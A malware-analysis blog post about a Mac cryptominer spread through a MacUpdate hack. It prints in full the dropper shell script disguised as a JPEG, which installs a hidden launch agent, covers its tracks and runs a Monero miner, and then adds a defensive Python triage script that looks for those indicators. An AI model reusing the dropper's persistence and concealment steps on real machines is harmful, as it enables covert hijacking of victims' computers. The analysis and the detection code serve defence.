New Mac cryptominer has 23 older variants

On February 1, a new Mac cryptominer was discovered being distributed via a hack of the MacUpdate website. Since then, we've been doing some digging and found that this isolated incident was just the tip of the iceberg. The malware delivered by the MacUpdate hack appears to be the culmination of something that has been around since at least early October of last year.

As we usually do when looking into new malware, we did some searches through the website VirusTotal, a massive crowd-sourced malware repository, to see if we could find any other variants. These searches, called "retrohunts," don't always turn up much, but in this case we struck gold, finding no fewer than 23 older variants of this malware!

The oldest of these was a file named "niceass.zip" (nice name). Decompressing the file resulted in a folder with two files: an image file called "ass.jpg" and an apparently broken application named "temp."

As indicated by the Finder, the "temp" application does not work at all, and on inspection, it didn't even have the right internal structure to be a macOS app. However, the contents are nonetheless intriguing. They are:

- An "ass.jpg" image (which you're really better off not seeing)
- A file named ".plist" which is a launch agent plist file
- An executable named "Dock" (the same name as the Apple process that manages the Dock)
- A Frameworks folder containing some external framework code that must be needed by the Dock executable

Clearly, this isn't an app, but some kind of naughtiness is planned.

What about the first ass.jpg file, located outside the temp.app bundle? In what I bet is not at all surprising to anyone, it turns out it's not actually a JPEG file. It is a shell script:

nohup mv ~/Downloads/niceass/temp.app ~/Downloads/niceass/.tmp
mv ~/Downloads/niceass/.tmp/Apple ~/Library &
mkdir -p ~/Library/LaunchAgents &
mv ~/Library/Apple/.plist ~/Library/LaunchAgents &
launchctl load -w ~/Library/LaunchAgents/.plist &
rm -rf ~/Downloads/niceass/.tmp &
rm ~/Downloads/niceass/ass.jpg &
mv ~/Library/Apple/ass.jpg ~/Downloads/niceass &
open -a Preview ~/Downloads/niceass/ass.jpg &
~/Library/Apple/Dock -user -xmr &
killall Terminal

As we can see, this script assumes it will be run from within the niceass folder, which in turn must be in the Downloads folder. If it's anywhere else, or if you removed the broken temp.app, the malware will fail completely.

The first step is to rename temp.app to ".tmp", which hides it from view thanks to the initial period in the name. (I'm not sure why it wasn't distributed with this name in the first place, which would have been far less suspicious.) Next, it moves the various components out of the niceass folder and into the desired locations: the Apple folder goes into ~/Library, and the hidden .plist file goes into ~/Library/LaunchAgents, where it is registered with launchctl load -w so that launchd will keep loading the agent at every login. Next, the script cleans up a bit and replaces the ass.jpg file with the ass.jpg file from inside the Apple folder. That file is then opened in Preview (ow, my eyes!) to cover up the fact that what was opened wasn't just an image file. Finally, the malicious Dock process is launched, passing in what appears to be an erroneous email address as the username to log in to Minergate, and the Terminal window the script ran in is killed so the user never sees it. Dock will then suck up as much CPU time as it can to mine the Monero cryptocurrency.
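The script above leaves three things a responder can check for: an "image" whose bytes are really a shell script, a hidden launch agent that starts a binary out of a user-writable ~/Library/Apple folder with a miner-style -xmr argument, and the moved or leftover files themselves. The triage script below is an added example written for this page, not code from the Malwarebytes post. It builds a throwaway home directory with constructed indicators and runs those checks over it; the launch agent's contents (its Label, RunAtLoad, and the user@example.com address) are assumptions, since the post shows only the file name and the Dock invocation, and the bytes written for the Dock binary are a placeholder, not a real sample.

```python
"""Triage checks for the niceass dropper's leftovers.

Added example, not code from the original post. It builds a throwaway
home directory containing constructed indicators and runs three checks
over it: is the "image" really a JPEG, which launch agents look like
the dropper's, and which dropper paths are present.
"""
import plistlib
import tempfile
from pathlib import Path

JPEG_MAGIC = b"\xff\xd8\xff"  # JPEG Start-Of-Image marker


def classify_image_file(path):
    """'jpeg' if the file carries the JPEG magic, 'text' if it is plain
    printable text (e.g. a shell script with a .jpg extension), else 'binary'."""
    head = Path(path).read_bytes()[:512]
    if head.startswith(JPEG_MAGIC):
        return "jpeg"
    if head and all(b in b"\t\n\r" or 32 <= b < 127 for b in head):
        return "text"
    return "binary"


def audit_launch_agents(home):
    """Map each suspicious ~/Library/LaunchAgents entry to the reasons it was flagged."""
    home = Path(home)
    findings = {}
    agents_dir = home / "Library" / "LaunchAgents"
    if not agents_dir.is_dir():
        return findings
    user_apple = str(home / "Library" / "Apple") + "/"
    for plist_path in sorted(agents_dir.iterdir()):
        reasons = []
        if plist_path.name.startswith("."):
            reasons.append("hidden filename")  # the dropper names its agent ".plist"
        try:
            with open(plist_path, "rb") as f:
                plist = plistlib.load(f)
        except Exception:
            reasons.append("not a parseable plist")
            findings[plist_path.name] = reasons
            continue
        cmd = [str(plist["Program"])] if plist.get("Program") else []
        cmd += [str(a) for a in plist.get("ProgramArguments", [])]
        # ~/Library/Apple is user-writable and not where Apple ships binaries.
        if any(a.startswith(user_apple) or a.startswith("~/Library/Apple/") for a in cmd):
            reasons.append("program under ~/Library/Apple")
        if "-xmr" in cmd:
            reasons.append("miner-style argument -xmr")
        if reasons:
            findings[plist_path.name] = reasons
    return findings


def find_dropper_residue(home):
    """Paths the script creates, or leaves behind when it fails part-way."""
    home = Path(home)
    candidates = [
        home / "Library" / "Apple" / "Dock",
        home / "Downloads" / "niceass" / ".tmp",
        home / "Downloads" / "niceass" / "temp.app",
    ]
    return [str(p.relative_to(home)) for p in candidates if p.exists()]


def triage(home):
    """Run all three checks against one home directory."""
    home = Path(home)
    return {
        "downloaded_jpg": classify_image_file(home / "Downloads" / "niceass" / "ass.jpg"),
        "launch_agents": audit_launch_agents(home),
        "residue": find_dropper_residue(home),
    }


def build_sample_home():
    """CONSTRUCTED post-infection layout for offline testing; no real samples."""
    home = Path(tempfile.mkdtemp(prefix="niceass-triage-"))
    (home / "Downloads" / "niceass").mkdir(parents=True)
    (home / "Library" / "Apple").mkdir(parents=True)
    (home / "Library" / "LaunchAgents").mkdir(parents=True)
    # The "image" the victim opened: plain text; only the script's first line is reproduced.
    (home / "Downloads" / "niceass" / "ass.jpg").write_text(
        "nohup mv ~/Downloads/niceass/temp.app ~/Downloads/niceass/.tmp\n")
    # The real JPEG the script swaps in later (header only).
    (home / "Library" / "Apple" / "ass.jpg").write_bytes(JPEG_MAGIC + b"\xe0" + bytes(16))
    # Placeholder bytes standing in for the Dock binary.
    (home / "Library" / "Apple" / "Dock").write_bytes(b"\xcf\xfa\xed\xfe")
    # Agent contents are an assumption: the post shows only the file name and the
    # "Dock -user <address> -xmr" invocation; the address here is made up.
    agent = {
        "Label": "example.hidden.agent",
        "ProgramArguments": [str(home / "Library" / "Apple" / "Dock"),
                             "-user", "user@example.com", "-xmr"],
        "RunAtLoad": True,
    }
    with open(home / "Library" / "LaunchAgents" / ".plist", "wb") as f:
        plistlib.dump(agent, f)
    # A benign agent for contrast; it should not be flagged.
    with open(home / "Library" / "LaunchAgents" / "com.example.backup.plist", "wb") as f:
        plistlib.dump({"Label": "com.example.backup",
                       "ProgramArguments": ["/usr/bin/true"]}, f)
    return home


if __name__ == "__main__":
    for key, value in triage(build_sample_home()).items():
        print(f"{key}: {value}")
```

On a real Mac you would call triage() on the actual home directory instead of the constructed one, and pair the launch agent audit with `launchctl list`, since an agent that has already been loaded with `launchctl load -w` keeps running until it is unloaded, not just until its plist is deleted. The magic-byte check is the cheap version of what `file` does; the point is that an extension tells you nothing about what double-clicking will execute.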